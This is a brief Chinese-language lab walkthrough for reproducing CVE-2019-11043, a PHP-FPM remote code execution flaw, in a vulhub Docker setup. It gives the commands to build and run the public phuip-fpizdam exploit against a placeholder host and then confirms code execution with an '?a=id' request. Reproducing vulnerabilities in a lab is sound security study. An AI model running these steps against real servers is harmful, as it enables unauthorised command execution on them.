cve-2019-11043

环境搭建:

系统环境 装有docker环境的centos 7
然后从
github上https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043
按照他这个目录格式把文件建好。

然后就在目录下 docker-compose up
这里可能会很慢,下载镜像解决方案见下面这个:亲测有效
https://blog.csdn.net/qq_33925869/article/details/90767748

再者就是装个go环境
然后download别人的exp
地址:https://github.com/neex/phuip-fpizdam

然后在目录下go build下生成 phuip-fpizdam.exe

复现:

首先放问我们的IP:8080可以看到界面如下
出现helloworld即成功搭建好了

然后就在目录下phuip-fpizdam.exe http://x.x.x.x:8080/index.php
等执行成功后

然后就去访问:
http://x.x.x.x:8080/index.php?a=id
若返回id即复现成功